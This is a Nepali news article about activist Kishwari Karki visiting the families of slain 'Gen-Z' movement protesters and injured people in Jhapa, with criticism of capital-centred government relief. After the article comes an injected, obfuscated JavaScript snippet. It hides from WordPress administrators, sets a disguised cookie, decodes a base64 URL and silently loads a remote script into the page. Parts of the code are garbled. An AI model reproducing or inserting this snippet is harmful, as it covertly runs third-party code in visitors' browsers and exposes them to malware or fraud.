झापा/ किश्वरी कार्की ‘जेन–जि आन्दोलन’का क्रममा ज्यान गुमाएका झापाका दुई जना शहीदका परिवारलाई भेट्दै घाइतेको अवस्था बुझ्न झापा आउनुभएको छ। युवा नागरिक समाजका केन्द्रीय अध्यक्ष केशव भण्डारीको नेतृत्वमा कार्कीलाई शहीद परिवारसँग भेट गराइएको हो।

देश परिवर्तनका लागि युवा नागरिक समाजले कुशासन र बेथितिका विरुद्धमा भूमिका खेलिरहेको र फेरि त्यस्तो आन्दोलन नहोस् भन्दै देशले सुशासनको बाटोमा पाइला चाल्नुपर्ने कुरा समाजका केन्द्रीय अध्यक्ष केशव भण्डारीले बताउनुभयो।

भदौ २३ र २४ गते ‘जेन–जि’ पुस्ताले भ्रष्टाचार र बेथितिका विरुद्ध सञ्चालन गरेको आन्दोलनको उपलब्धि परिणाममुखी नभएको सन्दर्भमा, आन्दोलनका क्रममा साहसिक भूमिका निर्वाह गर्दै काठमाडौंका घाइतेको उद्धारमा सक्रिय किश्वरी कार्कीले विर्तामोडस्थित बी एण्ड सी अस्पताल पुगेर घाइतेहरूको अवस्था बुझ्नुभएको हो।

प्रधानमन्त्री सुशिला कार्कीको नेतृत्वको सरकारले घाइते नागरिकहरूका लागि वितरण गर्ने कार्ड राजधानी केन्द्रित गरेको विषयमा समेत चौतर्फी आलोचना भइरहेको छ। यसै सन्दर्भमा ‘जेन–जि’ पुस्ताबाट नेतृत्व गर्ने युवाहरूको पहिचान नहुँदा राज्य संयन्त्रका धेरै गतिविधिहरूमा समस्या देखिएको छ।

झापाका ग्यानेन्द्र सेडाई गोपाल परिवारको कान्छो छोरो भए पनि जेठो छोरो विदेश भएकाले बा–आमाको सहारा बनेका थिए। आन्दोलनमा गोली लागेर ढलेका अर्जुनधारा–११ लक्ष्मिधापका गोपालका बा–आमाका आँखा अझै ओभाएका छैनन्।

यस सन्दर्भमा किश्वरी कार्कीले राज्य संयन्त्रलाई राजधानीमा मात्र होइन, राजधानी बाहिर पनि शहिद तथा घाइतेहरु रहेको सरकारलाई अनुरोध गर्दै उहाँहरुको मर्म र भावना अनुरुप काम गर्न अनुरोध गर्नुभयो । शहीद परिवार र घाइतेहरू रहेका ठाउँमा समेत अनुकूल हुने गरी कार्यक्रमहरू सञ्चालन गर्न नेपाल सरकारलाई अनुरोध गर्नुभयो।

त्यस्तै अर्जुनधारा–८ हात्तिकिल्लाका दिनेश राजवंशीको परिवारको अवस्था बुझ्नका लागि किश्वरी कार्कीसहितको टोली शहीद राजवंशीकै घरमा पुगेको थियो। जहाँ पुग्दा दिनेशकी आमाका आँखाबाट आँसुको धारा रोकिएन। किश्वरी कार्कीका पिता समेत बेपत्ता पारिएका बुझिएको छ। १० वर्षे जनयुद्धकालमा सरकार पक्षबाट गिरफ्तारीमा परेका उनका बा–आमामध्ये आमा भने केही महिना जेल जीवन बिताएर परिवारमै फर्किनुभएको थियो, तर बाबाको अवस्था अझै अज्ञात रहेको छ।

परिवारको जिम्मेवारी सम्हाल्दै आमासँगै रहनुभएकी किश्वरी कार्की वास्तवमा देशकै एक बहादुर सिपाही मात्र होइन, ‘जेन–जि’ पुस्ताकी एक साहसी प्रतिनिधि हुन्। उनी जिउँदो शहीदको रूपमा समेत परिचित बन्नुभएको छ।

आन्दोलनमा बर्बरतापूर्ण रूपमा गोली चलिरहेकै सन्दर्भमा बन्दुकको मुखबाट आफ्नो ज्यानको पर्वाह नगरी घाइते युवाहरूलाई उठाउँदै बाइकमा राखेर अस्पताल पुर्याउने भूमिकामा किश्वरीको योगदान अविस्मरणीय रह्यो।
(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();









